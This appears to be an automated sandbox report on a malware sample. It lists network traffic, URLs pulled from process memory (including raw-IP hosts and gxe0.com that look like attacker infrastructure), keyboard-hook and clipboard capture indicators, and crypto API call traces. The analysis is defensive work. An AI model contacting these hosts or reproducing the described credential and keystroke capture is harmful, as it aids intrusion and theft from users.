                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/plain; charset=utf-8 | X-Content-Type-Options: nosniff | Date: Mon, 18 Nov 2024 08:58:44 GMT | Content-Length: 19 | Data Ascii: 404 page not found
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Mon, 18 Nov 2024 08:58:49 GMT | Content-Type: text/html | Content-Length: 580 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Mon, 18 Nov 2024 08:58:50 GMT | Content-Type: text/html | Content-Length: 580 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Mon, 18 Nov 2024 08:59:05 GMT | Content-Type: text/html | Content-Length: 580 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Mon, 18 Nov 2024 08:59:06 GMT | Content-Type: text/html | Content-Length: 580 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: alg.exe, 00000022.00000003.1726694994.000000000017C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/eoqitiy
                    Source: Native_neworigin.exe, 00000020.00000003.1758689700.00000000053F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/iwtyrexju
                    Source: alg.exe, 00000022.00000003.2954389198.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/qmctu
                    Source: alg.exe, 00000022.00000003.2954389198.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/qmctusn
                    Source: alg.exe, 00000022.00000003.2967749938.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/brgveksk
                    Source: alg.exe, 00000022.00000003.1912810265.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1799180308.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2003839960.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1797273524.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1786459998.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/chqlbpn
                    Source: alg.exe, 00000022.00000003.2353534321.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/jafoumisskbo
                    Source: alg.exe, 00000022.00000003.2307499755.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/jfcmbfmivxyjaX
                    Source: alg.exe, 00000022.00000003.2967749938.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/qmctu
                    Source: alg.exe, 00000022.00000003.2242323432.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2627341141.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2430544276.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2122882435.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2296248107.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2274219091.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2141791316.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2106221522.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2195841831.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2320571977.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2547916936.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2004099122.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2354326017.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ceginiuaduqvi
                    Source: alg.exe, 00000022.00000003.2242323432.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2627341141.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2430544276.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2122882435.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2296248107.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2274219091.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2141791316.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2106221522.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2195841831.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2320571977.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2547916936.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2004099122.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2354326017.000000000015E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ceginiuaduqvis
                    Source: Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/csle
                    Source: Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/hwverablwtpyp
                    Source: Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ui
                    Source: alg.exe, 00000022.00000003.1912810265.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2003839960.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/ceginiuaduqvi
                    Source: Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/csle
                    Source: alg.exe, 00000022.00000003.2141318438.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/pjqqch
                    Source: alg.exe, 00000022.00000003.2003839960.0000000000196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/yqjfubvmytgoP
                    Source: alg.exe, 00000022.00000003.2575632812.000000000018A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140/sywxrbcrkxovprj
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                    Source: Native_neworigin.exe, 00000020.00000002.1953055035.0000000005370000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C76000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000003096000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                    Source: Native_neworigin.exe, 00000020.00000002.1953055035.0000000005370000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C76000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000003096000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                    Source: Native_neworigin.exe, 00000020.00000002.1931595213.0000000003096000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s82.gocheapweb.com
                    Source: Native_neworigin.exe, 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: AnyDesk.PIF, AnyDesk.PIF, 0000000F.00000002.1682798891.00000000029B3000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1781580936.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1293907494.00000000029BD000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BFB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1663538271.000000002212D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020C49000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1663538271.000000002218B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1761274523.00000000224F5000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1691758562.0000000002ECE000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 0000001F.00000000.1665063094.0000000000416000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.pmail.com
                    Source: Native_neworigin.exe, 00000020.00000002.1953055035.0000000005370000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C60000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C76000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000003096000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: Native_neworigin.exe, 00000020.00000002.1953055035.0000000005370000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C60000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C76000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000003096000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
                    Source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
                    Source: Native_neworigin.exe, 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Native_neworigin.exe, 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: Native_neworigin.exe, 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: Native_neworigin.exe, 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
                    Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
                    Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
                    Source: AnyDesk.PIF, 0000000F.00000002.1668921503.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/
                    Source: AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtm
                    Source: AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1668921503.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyy
                    Source: AnyDesk.PIF, 0000000F.00000002.1668921503.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com:443/yak2/233_Juqmtmyadyy
                    Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
                    Source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
                    Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
                    Source: alg.exe, 00000022.00000003.2474411546.0000000000530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2478496148.0000000000530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2477848647.0000000000530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://scss.adobesc.com
                    Source: alg.exe, 00000022.00000003.2478496148.0000000000530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://scss.adobesc.comreasoncom.adobe.review.sdk
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                    Source: unknown, HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.7:49700 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49892 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49996 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:50000 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, cPKWk.cs, .Net Code: I3Mi2zn6x
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, Windows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, Window created: window name: CLIPBRDWNDCLASS

                    E-Banking Fraud

                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F139B684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F13E342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F14193A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F13D184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F14198B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext
